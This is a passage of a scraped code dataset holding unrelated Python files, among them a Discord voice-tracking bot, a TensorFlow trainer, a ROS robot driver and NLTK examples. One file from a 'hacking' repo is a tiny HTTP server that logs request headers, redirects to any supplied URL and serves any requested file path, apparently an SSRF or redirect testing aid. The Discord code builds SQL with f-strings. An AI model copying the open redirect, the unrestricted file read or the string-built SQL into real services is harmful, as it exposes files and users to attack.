for val in result: voicetime += val[2]\n return int(voicetime)\n\n# Responsible for calculating average voicetime in a search result\ndef avg_voicetime_result(result):\n total = 0\n i = 0\n for val in result:\n if val[3] == 0: total += val[2]\n else: total += val[3]\n i += 1\n return int(total / i)\n\nasync def get_recent_voice_activity(user: discord.Member, page_size=10, offset=0):\n \n sel_cmd = (\n \"SELECT end_time, server_id, (end_time - start_time) AS total \"\n f\"FROM VOICE_HISTORY WHERE user_id='{user.id}' AND \"\n f\"end_time is not NULL \"\n f\"AND (end_time - start_time)>={tunables('THRESHOLD_LIST_VOICE_ACTIVITY')} \"\n \"ORDER BY end_time DESC \"\n f\"LIMIT {page_size} OFFSET {offset}\"\n )\n \n items = await db.execute(sel_cmd)\n if items == []: return None\n return items\n\nasync def get_voicetime_today(user_id) -> int:\n sel_cmd = (\n f\"SELECT SUM(end_time - {today()}) \"\n \"FROM VOICE_HISTORY WHERE \"\n f\"user_id='{user_id}' AND end_time is not NULL AND end_time>='{today()}' AND (end_time - start_time)>={tunables('THRESHOLD_LIST_VOICE_ACTIVITY')} \"\n f\"AND start_time<'{today()}'\"\n )\n voice_activity_before_midnight = await db.execute(sel_cmd)\n\n sel_cmd = (\n \"SELECT SUM(end_time - start_time) \"\n \"FROM VOICE_HISTORY WHERE \"\n f\"user_id='{user_id}' AND end_time is not NULL AND start_time>='{today()}' AND (end_time - start_time)>={tunables('THRESHOLD_LIST_VOICE_ACTIVITY')} \"\n )\n voice_activity_after_midnight = await db.execute(sel_cmd)\n\n if voice_activity_before_midnight is None: voice_activity_before_midnight = 0\n if voice_activity_after_midnight is None: voice_activity_after_midnight = 0\n return int(voice_activity_after_midnight + voice_activity_before_midnight)\n\nasync def get_total_voice_activity_updates(user_id: int) -> int:\n sel_cmd = (\n \"SELECT COUNT(*) FROM VOICE_HISTORY WHERE \"\n f\"user_id='{user_id}' AND end_time is not NULL AND \"\n f\"(end_time - start_time)>={tunables('THRESHOLD_LIST_VOICE_ACTIVITY')}\"\n )\n val = await db.execute(sel_cmd)\n if val == []: return int(0)\n else: return int(val)\n\nasync def get_total_voicetime_user(user_id) -> int:\n sel_cmd = (\n \"SELECT SUM(end_time - start_time) FROM VOICE_HISTORY WHERE \"\n f\"user_id='{user_id}' AND end_time is not NULL AND \"\n f\"(end_time - start_time)>={tunables('THRESHOLD_LIST_VOICE_ACTIVITY')} GROUP BY user_id\"\n )\n val = await db.execute(sel_cmd)\n if val == []: return int(0)\n else: return int(val)\n\nasync def get_total_voicetime_user_guild(user_id, server_id) -> int:\n sel_cmd = (\n \"SELECT SUM(end_time - start_time) FROM VOICE_HISTORY WHERE \"\n f\"user_id='{user_id}' AND server_id='{server_id}' AND end_time is not NULL AND \"\n f\"(end_time - start_time)>={tunables('THRESHOLD_LIST_VOICE_ACTIVITY')} GROUP BY user_id\"\n )\n val = await db.execute(sel_cmd)\n if val == []: return int(0)\n else: return int(val)\n\nasync def get_average_voice_session(user_id: discord.User) -> str:\n \n sel_cmd = (\n \"SELECT AVG(end_time - start_time) FROM VOICE_HISTORY WHERE \"\n f\"user_id='{user_id}' AND \"\n f\"(end_time - start_time)>={tunables('THRESHOLD_LIST_VOICE_ACTIVITY')}\"\n )\n\n val = await db.execute(sel_cmd)\n if val is None or val == []: return \"`None`\"\n return f\"`{time_elapsed(int(val), 'h')}`\"\n\nasync def last_voiced_server(user_id, server_id) -> int:\n \n sel_cmd = (\n \"SELECT end_time FROM VOICE_HISTORY WHERE \"\n f\"user_id='{user_id}' AND server_id='{server_id}' \"\n \"AND end_time is not NULL \"\n \"ORDER BY end_time DESC LIMIT 1\"\n )\n \n val = await db.execute(sel_cmd)\n if val == []:\n return 0\n else: return int(val)\n\nasync def process_voice_state(u: MikoMember, bef: discord.VoiceState, cur: discord.VoiceState):\n\n # if channel has not changed, ignore this update\n if bef.channel == cur.channel: return\n\n '''\n Using functions locate_htable_obj and determine_htable_key, we are\n able to briefly allow for \"duplicate\" hash entries, allowing us to handle\n when discord sends updates out of order ('join' before 'left').\n '''\n async def stop():\n sesh = locate_htable_obj(map=VOICE_SESSIONS,\n key=u.user.id,\n comparable=u.guild.id)\n if sesh[0] is not None:\n await sesh[0].end()\n del VOICE_SESSIONS[sesh[1]]\n \n async def start():\n if not await u.track_voicetime: return\n sesh = locate_htable_obj(map=VOICE_SESSIONS,\n key=u.user.id,\n comparable=u.guild.id)\n if sesh[0] is not None: await stop()\n key = determine_htable_key(map=VOICE_SESSIONS, key=u.user.id)\n va = VoiceActivity(u=u)\n await va.ainit()\n VOICE_SESSIONS[key] = va\n await VOICE_SESSIONS[key].heartbeat()\n\n async def check_tracking():\n sesh = locate_htable_obj(map=VOICE_SESSIONS,\n key=u.user.id,\n comparable=u.guild.id)\n if sesh[0] is None: await start()\n \n '''If member joins any voice channel that is not the afk channel, start tracking'''\n if bef.channel is None and (cur.channel is not None and cur.channel != cur.channel.guild.afk_channel):\n await start()\n return\n \n '''If member leaves all voice channels or goes to the afk channel, stop tracking'''\n if (bef.channel is not None and bef.channel != u.guild.afk_channel) and (cur.channel is None or cur.channel == cur.channel.guild.afk_channel):\n await stop()\n return\n \n '''\n If member is in afk channel but moves to active channel, start tracking\n If member is in channel in same guild but is moved/switches to another\n channel, continue tracking\n '''\n if bef.channel is not None and (cur.channel is not None and cur.channel != u.guild.afk_channel):\n await check_tracking()\n return","repo_name":"ryandis44/definitely-not-a-bot","sub_path":"Voice/track_voice.py","file_name":"track_voice.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15389081810","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def rotateRight(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n if k == 0 or not head :\n return head\n \n cur = head\n l = 1 \n\n while cur.next:\n cur = cur.next\n l += 1\n rot = k % l\n cur.next = head \n\n new_tail = head\n for i in range(l-rot-1):\n new_tail = new_tail.next\n\n res = new_tail.next\n new_tail.next = None \n \n return res\n","repo_name":"Hiwot2127/Competitive_Programming","sub_path":"Rotate List.py","file_name":"Rotate List.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5163001080","text":"# !/usr/bin/env python\nimport argparse\nimport warnings\nimport platform\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='FTNet Semantic Segmentation Training With Pytorch')\n\n# =============================================================================\n# Models\n# =============================================================================\n parser.add_argument('--mode',\n type=str,\n default='train',\n choices=['train', 'test', 'train_test'],\n help='Status of the trainer')\n\n parser.add_argument('--train_only',\n type=str2bool,\n default=False,\n help='Set this for training Cityscapes dataset only')\n\n parser.add_argument('--model',\n type=str,\n default='ftnet',\n help='Model name (default: ftnet)')\n\n parser.add_argument('--backbone',\n type=str,\n default='resnext50_32x4d',\n help='Backbone name (default: resnext50_32x4d)')\n\n parser.add_argument('--pretrained-base',\n type=str2bool,\n default=True,\n help='Use pretrained ImageNet backbone')\n\n parser.add_argument('--dilation',\n type=str2bool,\n default=False,\n help='Use dilated backbone')\n# =============================================================================\n# Data and Dataloader\n# =============================================================================\n parser.add_argument('--dataset',\n type=str,\n default='soda',\n choices=['cityscapes_thermal_combine', 'soda', 'mfn', 'scutseg'],\n help='Dataset to be utilized (default: soda)')\n\n parser.add_argument('--dataset-path',\n type=str,\n default='./Dataset/',\n help='Path to the dataset folder')\n\n parser.add_argument('--base-size',\n type=str,\n default='300',\n help='Base image size.\\\n Note: First value is considered for validation and testing. \\\n Please provide multiple size by using a + operator for example 256+512+768')\n\n parser.add_argument('--crop-size',\n type=str,\n default='256',\n help='Crop image size \\\n Note: First value is considered for validation and testing. \\\n Please provide multiple size by using a + operator for example 256+512+768')\n\n parser.add_argument('--workers',\n type=int,\n default=16,\n help='Total number of workers for dataloader')\n\n parser.add_argument('--no-of-filters',\n type=int,\n default=128,\n help='Number of filter for the FTNet')\n\n parser.add_argument('--edge-extracts',\n type=str,\n default='3',\n help='The position of the encoder from which the edges needs to be extracted')\n\n parser.add_argument('--num-blocks',\n type=int,\n default=2,\n help='Total number of residual units per stream')\n\n parser.add_argument('--train-batch-size',\n type=int,\n default=16,\n help='Input batch size for training (default: 16)')\n\n parser.add_argument('--val-batch-size',\n type=int,\n default=4,\n help='Input batch size for validation (default: 8)')\n\n parser.add_argument('--test-batch-size',\n type=int,\n default=1,\n help='Input batch size for testing (default: 1)')\n\n parser.add_argument('--accumulate-grad-batches',\n type=int,\n default=1,\n help='Number of batches to be accumulated doing a backwards pass')\n\n parser.add_argument('--test-monitor',\n type=str,\n default='val_mIOU',\n help='The metric with best value to be tested')\n\n parser.add_argument('--test-monitor-path',\n type=str,\n help='Path to the checkpoint folder')\n\n# =============================================================================\n# WandB\n# =============================================================================\n\n parser.add_argument('--wandb-id',\n type=str,\n default=None,\n help='Sets the version, mainly used to resume a previous run.')\n\n parser.add_argument('--wandb-name-ext',\n type=str,\n default='None',\n help='Name_extension_wandb')\n\n# =============================================================================\n# Training hyper params\n# =============================================================================\n\n parser.add_argument('--epochs',\n type=int,\n default=100,\n help='Number of epochs to train (default: 100)')\n\n parser.add_argument('--loss-weight',\n type=int,\n default=1,\n help='Auxiliary loss weight')\n\n# =============================================================================\n# Optimizer and scheduler parameters\n# =============================================================================\n parser.add_argument('--optimizer',\n default='SGD',\n choices=('SGD', 'ADAM', 'RMSprop', 'AdaBound'),\n help='Optimizer to use (SGD | ADAM | RMSprop | AdaBound)')\n\n parser.add_argument('--lr',\n type=float,\n default=0.01,\n help='Learning rate (default: 0.01)')\n\n parser.add_argument('--momentum',\n type=float,\n default=0.9,\n help='Momentum (default: 0.9)')\n\n parser.add_argument('--nesterov',\n type=str2bool,\n default=False,\n help='Set Nesterov')\n\n parser.add_argument('--weight-decay',\n type=float,\n default=0.0001,\n help='Weight-decay (default: 5e-4)')\n\n parser.add_argument('--beta1',\n type=float,\n default=0.9,\n help='Beta1 parameter in optimizer')\n\n parser.add_argument('--beta2',\n type=float,\n default=0.999,\n help='Beta2 parameter in optimizer')\n\n parser.add_argument('--epsilon',\n type=float,\n default=1e-8,\n help='Epsilon for numerical stability')\n\n parser.add_argument('--scheduler-type',\n type=str,\n default='poly_warmstartup',\n choices=('step', 'multistep_90_160',\n 'poly_warmstartup', 'multistep_warmstartup', 'onecycle'),\n help='Learning rate decay type')\n\n parser.add_argument('--warmup-iters',\n type=int,\n default=0,\n help='Warmup iteration')\n\n parser.add_argument('--warmup-factor',\n type=float,\n default=1.0 / 3,\n help='Warmup factor for the scheduler')\n\n parser.add_argument('--warmup-method',\n type=str,\n default='linear',\n help='Method of warmup')\n\n parser.add_argument('--gamma',\n type=float,\n default=0.5,\n help='Learning rate decay factor for step decay')\n\n# =============================================================================\n# Checkpoint and log\n# =============================================================================\n parser.add_argument('--resume',\n type=str,\n default=None,\n help='Provide the path of the checkpoint to be resumed. \\\n If not provided, the save directory will be utilized to continue training')\n\n parser.add_argument('--save-dir',\n default='./../../Results/',\n help='Directory for saving checkpoint models')\n\n parser.add_argument('--test-checkpoint',\n default=None,\n help='Checkpoint for testing')\n\n parser.add_argument('--save-images',\n type=str2bool,\n default=False,\n help='Save validation and testing Images')\n\n parser.add_argument('--save-images-as-subplots',\n type=str2bool,\n default=False,\n help='Save Validation and Testing Images as subplots or complete images. \\\n Note: save-images needs to be set as True')\n\n# =============================================================================\n# MISC\n# =============================================================================\n parser.add_argument('--debug',\n type=str2bool,\n default=True,\n help='Enable debugging mode')\n\n parser.add_argument('--seed', type=int, default=123,\n help='Seed for the process')\n\n parser.add_argument('--num-nodes',\n default=1,\n type=int,\n help='Number of Nodes available for computing(default=1)')\n\n parser.add_argument('--gpus',\n default=1,\n type=int,\n help='If set to None, all the gpus are used else specific gpu is used')\n\n parser.add_argument('--distributed-backend',\n type=str,\n default='dp',\n choices=('dp', 'ddp', 'ddp2', 'horovod'),\n help='supports three options dp, ddp, ddp2')\n\n args = parser.parse_args()\n\n def _split(args):\n return list(map(lambda x: int(x), args.split('+')))\n\n args.base_size = _split(args.base_size)\n args.crop_size = _split(args.crop_size)\n\n args.edge_extracts = _split(args.edge_extracts)\n\n assert all(earlier >= later for earlier, later in zip(\n args.base_size, args.base_size[1:])), \"Base size should be in descending order\"\n\n return args\n","repo_name":"shreyaskamathkm/FTNet","sub_path":"Codes/src/lightning_scripts/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":11490,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"32"} +{"seq_id":"3979734545","text":"# В большой текстовой строке подсчитать количество встречаемых слов и вернуть 10 самых частых.\r\n# Не учитывать знаки препинания и регистр символов. За основу возьмите любую статью\r\n# из википедии или из документации к языку.\r\n\r\nimport string\r\n\r\nwith open('task-3-2.txt', encoding='utf-8') as data:\r\n my_str = data.read()\r\n\r\nmy_list = [i.strip(string.punctuation).lower() for i in my_str.split()]\r\nmy_set = set(my_list)\r\nmy_dict = {key: my_list.count(key) for key in my_set}\r\nprint('10 самых часто встречаемых слов в статье:')\r\nfor i in range(10):\r\n spam = max(my_dict, key=my_dict.get)\r\n eggs = my_dict[spam]\r\n my_dict.pop(spam)\r\n print(f'{i + 1:>2}. {spam:<10} -> {eggs:>3} раз.')\r\n","repo_name":"fedunya/Immersion_in_Python","sub_path":"task-3-2.py","file_name":"task-3-2.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16670554767","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\nimport socketserver\nimport urllib.parse\nimport sys\nimport logging\n\nlogger = logging.getLogger('server')\nlogger.setLevel(logging.DEBUG)\nfh = logging.FileHandler('server.log')\nlogger.addHandler(fh)\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n path=urllib.parse.unquote(self.path)\n print(\"path\", path)\n logger.info(\"headers: %s\", self.headers)\n if path.startswith('/?r',0,3):\n to_url=path[4:]\n print(\"to_url\",to_url)\n self.send_response(302)\n self.send_header('Location', to_url)\n self.end_headers()\n else:\n file_to_read=path[1:]\n print(\"file_to_read\", file_to_read)\n self.send_response(200)\n self.send_header(\"Content-type\", \"image/svg+xml\")\n self.end_headers()\n file=open(file_to_read,\"rb\")\n self.wfile.write(file.read())\n\n\nPORT=int(sys.argv[1])\nwith socketserver.TCPServer((\"\", PORT), Handler) as httpd:\n print(\"serving at port\", PORT)\n logger.info(\"serving at port %s\",PORT)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n httpd.server_close()\n","repo_name":"xvnpw/hacking","sub_path":"tools/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"73736291291","text":"# Trie\n\nclass TrieNode(object):\n def __init__(self) -> None:\n self.children = [None] * 26\n self.lastNode = False\n\n\nclass Trie(object):\n def __init__(self) -> None:\n self.root = TrieNode(\"\")\n self.lastNode = False\n\n def _charToIndex(self, char: str) -> int:\n return ord(char) - ord(\"a\")\n\n def insert(self, word: str) -> None:\n root = self.root\n for i in word:\n index = self._charToIndex(i)\n if not root.children[index]:\n root.children[index] = TrieNode()\n root = root.children[index]\n root.lastNode = True\n\n def search(self, word: str) -> bool:\n root = self.root\n for i in word:\n index = self._charToIndex(i)\n if not root.children[index]:\n return False\n root = root.children[index]\n return root.lastNode\n\n def startsWith(self, prefix: str) -> bool:\n root = self.root\n for i in prefix:\n index = self._charToIndex(i)\n if not root.children[index]:\n return False\n root = root.children[index]\n return True\n\n\nif __name__ == \"__main__\":\n trie = Trie()\n trie.insert(\"apple\")\n print(trie.search(\"apple\")) # returns true\n print(trie.search(\"app\")) # returns false\n print(trie.startsWith(\"app\")) # returns true\n print(trie.startsWith(\"apps\")) # returns False\n trie.insert(\"app\")\n print(trie.search(\"app\")) # returns true\n","repo_name":"garg10may/Data-Structures-and-Algorithms","sub_path":"graph/Tree/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17907551269","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pathlib\n\n#import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nimport sys\nEPOCHS = int(sys.argv[1])\n\nMODEL_SAVE_LOCATION = \"Models\\main_model\"\nCHECKPOINT_SAVE_LOCATION = \"Models\\checkpoint_model\"\n\nprint(\"Importing Data: Started\")\n#importing data\ntrainingSet = pd.read_csv(\"PostProcessData/trainingSet.csv\")\ntrainingLabelSet = pd.read_csv(\"PostProcessData/trainingLabelSet.csv\")\n\n#splitting data into training data and test data\n#trainingSet = dataset.sample(frac=0.8,random_state=0)\n#test_dataset = dataset.drop(trainingSet.index)\n\nprint(\"Importing Data: Complete\")\nprint(\"Building Model: Started\")\n\n#normalizing data\n#def norm(x):\n# return (x - train_stats['mean'])/train_stats['std']\n#trainingSet = norm(trainingSet)\n#testingSet = norm(test_dataset)\n\n#THE MODEL\n\n#Build the model\ndef build_model():\n model = keras.Sequential([\n layers.Dense(512, activation=tf.nn.relu, input_shape=[len(trainingSet.keys())]),\n layers.Dense(1024, activation=tf.nn.relu),\n layers.Dense(400, activation=tf.nn.relu),\n layers.Dense(200, activation=tf.nn.relu),\n layers.Dense(64, activation=tf.nn.relu),\n layers.Dense(1)\n ])\n\n optimizer = tf.keras.optimizers.RMSprop(0.001,0.9,0.01)\n\n model.compile(loss='mean_squared_error',\n optimizer=optimizer,\n metrics=['mean_absolute_error', 'mean_squared_error'])\n return model\n\nmodel = build_model()\n\n#inspecting the model\nmodel.summary()\n\n#training the model\n# Display training progress by printing a single dot for each completed epoch\nclass PrintDot(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs):\n print(epoch/EPOCHS * 100,\"%\")\n if epoch % 10 == 0: \n model.save(CHECKPOINT_SAVE_LOCATION)\n\n\n\nhistory = model.fit(\n trainingSet, trainingLabelSet,\n epochs=EPOCHS, validation_split = 0.2, verbose=0,\n callbacks=[PrintDot()])\n\nprint(\"training complete\")\n\nhist = pd.DataFrame(history.history)\nhist['epoch'] = history.epoch\nhist.tail()\n\n#model = build_model()\n\n# The patience parameter is the amount of epochs to check for improvement\n#early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=10)\n#\n#history = model.fit(trainingSet, trainingLabelSet, epochs=EPOCHS,\n# validation_split = 0.2, verbose=0, callbacks=[early_stop, PrintDot()])\n#\n#plot_history(history)\nmodel.save(MODEL_SAVE_LOCATION)","repo_name":"ahandswork/TensorFlow_CSharp_Crossover","sub_path":"NeuralNetPractice/bin/Debug/networkTrainer.py","file_name":"networkTrainer.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30756153353","text":"class Solution:\n # Approach: Hashmap, Counting, Complexity: O(n + k*m), O(max(n, k))\n # where, n -> size of \"chars\", m -> size of \"words\", k -> average word size.\n def countCharacters(self, words: List[str], chars: str) -> int:\n total_count = res = 0\n ch_counts = collections.defaultdict(int)\n\n # Count chars in \"chars\".\n for ch in chars:\n ch_counts[ch] += 1\n total_count += 1\n\n # Iterate over the words.\n for word in words:\n # Word with more letters than total letters in \"chars\" can't be created.\n if len(word) > total_count:\n continue\n\n # Create a copy of counts for modifications.\n avail = ch_counts.copy()\n for ch in word:\n # Count chars of word in copy of counts.\n if avail[ch] == 1:\n avail.pop(ch)\n else:\n avail[ch] -= 1\n\n # No char can have count < 0 for a valid word.\n if all(count > 0 for count in avail.values()):\n # Sum lengths of valid words.\n res += len(word)\n\n # Return sum of lengths of valid words.\n return res\n","repo_name":"ihadouken/lc","sub_path":"1160.find-words-that-can-be-formed-by-characters.py","file_name":"1160.find-words-that-can-be-formed-by-characters.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33354093384","text":"#!/usr/bin/env python3\nimport rospy\nimport time\n\nfrom sensor_msgs.msg import Range\nfrom smbus2 import SMBus\nfrom duckietown.dtros import DTROS, NodeType\nfrom duckietown_msgs.msg import WheelsCmdStamped, WheelEncoderStamped\n\nfrom cruise_control import cruise_control\nfrom Car import Car\nfrom Pid_controller import PID_Controller\n\nsparkfun_device_address = 62\nsparkfun_registry_address = 17\n\ntarget_sensor_position = 4.5\nvehicle_speed = 0.2\nrospy_rate = 40\n\nKp = 0.1\nKi = 0.004\nKd = 0.16\nI = 0\n\nspeed = WheelsCmdStamped()\nerror = 0\nlast_error = 0\ntof_distance = 0\nobstacle_avoidance_distance = 25\n\nclass Drive(DTROS):\n \n\n def __init__(self, node_name):\n super(Drive, self).__init__(\n node_name=node_name, node_type=NodeType.GENERIC)\n self.pub = rospy.Publisher(\n '/weirdbot/wheels_driver_node/wheels_cmd', WheelsCmdStamped, queue_size=10)\n self.sub = rospy.Subscriber(\n \"/weirdbot/front_center_tof_driver_node/range\", Range, self.obstacle_callback)\n \"\"\" self.sub = rospy.Subscriber(\n \"/weirdbot/left_wheel_encoder_node/tick\", WheelEncoderStamped, self.tick_callback) \"\"\"\n self.car = Car(0.2)\n self.pid_controller = PID_Controller(0.1, 0.004, 0.16, 0, 40)\n\n def obstacle_callback(self, data):\n tof_distance = round(data.range * 100)\n if tof_distance < obstacle_avoidance_distance:\n print('I am close: %s cm', tof_distance)\n self.car.obstacle_ahead = True\n # activate the drive around the obstacle part\n\n \"\"\" def tick_callback(self, data):\n print(\"TICKSSSSSS\", data.data) \"\"\"\n\n def on_shutdown(self):\n speed = WheelsCmdStamped()\n speed.vel_left = 0\n speed.vel_right = 0\n self.pub.publish(speed)\n rospy.on_shutdown()\n\n def stopper(self, binary):\n v = 0\n while v < 2:\n time.sleep(0.17)\n v += 1\n if binary == '00000000':\n self.car.speed_right_wheel = 0\n self.car.speed_left_wheel = 0\n self.publish_speed()\n\n def stop_for_03_sec(self):\n self.car.speed_right_wheel = 0\n self.car.speed_left_wheel = 0\n self.publish_speed()\n time.sleep(0.5)\n\n def move_forward_mid(self):\n self.car.speed_right_wheel = 0.3\n self.car.speed_left_wheel = 0.3\n self.publish_speed()\n time.sleep(0.9)\n\n def move_forward(self):\n self.car.speed_right_wheel = 0.3\n self.car.speed_left_wheel = 0.3\n self.publish_speed()\n time.sleep(1.2)\n\n def move_forward_constantly(self):\n self.car.speed_right_wheel = 0.3\n self.car.speed_left_wheel = 0.3\n self.publish_speed()\n # add exit condition here?\n\n def turn_left(self):\n self.car.speed_right_wheel = 0.9\n self.car.speed_left_wheel = 0\n self.publish_speed()\n time.sleep(0.3)\n\n def turn_right(self):\n self.car.speed_right_wheel = 0\n self.car.speed_left_wheel = 0.8\n self.publish_speed()\n time.sleep(0.3)\n\n def turn_right_a_little_bit(self):\n self.car.speed_right_wheel = -0.2\n self.car.speed_left_wheel = 0.6\n self.publish_speed()\n time.sleep(0.1)\n\n def turn_left_a_little_bit(self):\n self.car.speed_right_wheel = 0.3\n self.car.speed_left_wheel = 0\n self.publish_speed()\n time.sleep(0.1)\n\n def publish_speed(self):\n speed = WheelsCmdStamped()\n speed.vel_left = self.car.speed_left_wheel\n speed.vel_right = self.car.speed_right_wheel\n self.pub.publish(speed)\n\n def simple_track(self):\n global error\n global last_error\n\n rate = rospy.Rate(rospy_rate)\n\n while not rospy.is_shutdown():\n bus = SMBus(1)\n read = bus.read_byte_data(\n sparkfun_device_address, sparkfun_registry_address)\n\n binary = bin(read)[2:].zfill(8)\n\n \"\"\" if binary == '00000000':\n self.stopper(binary) \"\"\"\n \"\"\" if self.car.turn_at_next_left:\n for _ in range(2):\n self.car.speed_right_wheel = 0.22\n self.car.speed_left_wheel = 0.2\n self.publish_speed()\n rospy.sleep(0.4)\n self.car.turn_at_next_left = False \"\"\"\n #elif self.car.obstacle_ahead:\n if self.car.obstacle_ahead:\n print('AVOIDING OBSTACLE')\n while tof_distance < obstacle_avoidance_distance:\n if tof_distance >= obstacle_avoidance_distance:\n break\n self.turn_right_a_little_bit()\n \n self.stop_for_03_sec()\n self.car.obstacle_ahead = False\n \"\"\" self.turn_right()\n self.move_forward()\n self.turn_left()\n self.move_forward_mid()\n self.turn_left()\n read = bus.read_byte_data(\n sparkfun_device_address, sparkfun_registry_address)\n binary = bin(read)[2:].zfill(8)\n print(binary)\n car.obstacle_ahead = False\n while binary == '00000000':\n read = bus.read_byte_data(\n sparkfun_device_address, sparkfun_registry_address)\n binary = bin(read)[2:].zfill(8)\n if binary != '00000000':\n break\n print(binary)\n self.move_forward_constantly() \"\"\"\n else:\n cruise_control(error, last_error, read,\n target_sensor_position, self.pid_controller, self.car)\n\n speed.vel_right = self.car.speed_right_wheel\n speed.vel_left = self.car.speed_left_wheel\n self.pub.publish(speed)\n rate.sleep()\n bus.close()\n\n def run(self):\n self.simple_track()\n\n\nif __name__ == '__main__':\n node = Drive(node_name='Drive_Weirdbot_Drive')\n rospy.on_shutdown(node.on_shutdown)\n node.run()\n rospy.spin()\n","repo_name":"FrenchFriesForBallerina/my-ros-program","sub_path":"packages/my_package/src/Drive.py","file_name":"Drive.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24501685463","text":"# coding: utf-8\nfrom django.dispatch import Signal\n\n\n# Création d'un nouvel enregistrement\nrecord = Signal(['actor', 'action', 'target', 'content'])\n# Un ping de serveur XMLRPC de blog a échoué\nping_failed = Signal(['engine', 'feed'])\n# Check si un élément peut être indexé\ncheck_indexable = Signal(['instance']) # Renvoie True si indexable, sinon None\n","repo_name":"artscoop/scoop","sub_path":"scoop/core/util/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71336727450","text":"import os\nimport argparse\nimport pdb\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-wcs', '--which_cudas', nargs='+', default=[])\nconfig = parser.parse_args()\n\nif len(config.which_cudas) <= 0:\n raise Exception('Provide a list of cuda device integers using -wcs')\nfor i in config.which_cudas:\n os.system(f\"python pitchmatched_conversion.py -wc {i}\")","repo_name":"Trebolium/autoSvc","sub_path":"generate_multi.py","file_name":"generate_multi.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41821272068","text":"#词干提取与词形还原\nimport nltk\nfrom nltk.stem import PorterStemmer as stemmer\nfrom nltk.stem import WordNetLemmatizer as wnl\nfrom nltk import word_tokenize\nfrom nltk import sent_tokenize\nstems = stemmer()\n\nwords = ['annoys','annoying','annoyed','studies']\n\nwords_stem = [stems.stem(word=word) for word in words]\n\n#上面的studies就无法还原成study。用词形还原工具则可以\n#词形还原器的能力更强,但是对于大型语料库可以感受到它的速度更慢\n\n\nlemmatizer = wnl()\n\nwords_lemmatizer = [lemmatizer.lemmatize(word=word,pos='v') for word in words]\nprint(words_lemmatizer)\n\"\"\"\n注意,这里是需要wordnet语料的,但是由于中国防火墙的问题程序是无法下载的。在网上很容易搜索及下载到wordnet,\n然后放到相应的文件夹下。到底放在哪个文件夹?程序报错的信息会直接引导你找到正确答案\n\"\"\"\n\n#标记化单词\ns = 'hi! my name is Trump'\nword_tokenization = word_tokenize(s)\nprint(word_tokenization)\n\nsentence_tokenization = sent_tokenize(s)\nprint(sentence_tokenization)\n\n#删除停止词比如and、or、be等虚词\nfrom nltk.corpus import stopwords\n\ns = \"the weather is hot and i want to go for a swim\"\nstop_words = set(stopwords.words('english'))\n\ntokens = word_tokenize(s)\n\ntokens = [word for word in tokens if not word in stop_words]\nprint(tokens)\n","repo_name":"TrellixVulnTeam/CodeCenter_4ZN7","sub_path":"utility/nltk_tool.py","file_name":"nltk_tool.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10902455108","text":"from prompt_engineering.prompt_engineering import openai_count_tokens as count_tokens\nfrom prompt_engineering.prompt_engineering_consts import preview_prompt\nfrom data.utils import load_perovskite_data, calculate_mean, calculate_std, \\\n load_questions_db\n\n\ndef calculate_question_stats():\n data = load_perovskite_data('dataset/questions/questions_db.csv')\n gpt_questions = data[data['field_name'].notna()]['gpt_question']\n print(\"Questions amount: \" + str(len(gpt_questions)))\n\n questions_joined = ' '.join(gpt_questions)\n print(\"Tokens amount for questions: \" + str(count_tokens(questions_joined)))\n\n\ndef calculate_answer_stats():\n # calculate number of tokens in each answer (row).\n questions_data = load_questions_db()\n filtered_question = questions_data[questions_data['field_name'].notna()]['field_name']\n data = load_perovskite_data()[filtered_question]\n answers = rows_to_strings(data)\n answers_tokens = []\n for answer in answers:\n answers_tokens.append(count_tokens(answer))\n\n mean_token_count = calculate_mean(answers_tokens)\n std_token_count = calculate_std(answers_tokens)\n print(f\"The mean number of tokens across all answers is: {int(mean_token_count)} [{int(std_token_count)}]\")\n\n\ndef calculate_preview_stats():\n print(\"Tokens amount for preview_prompt: \" + 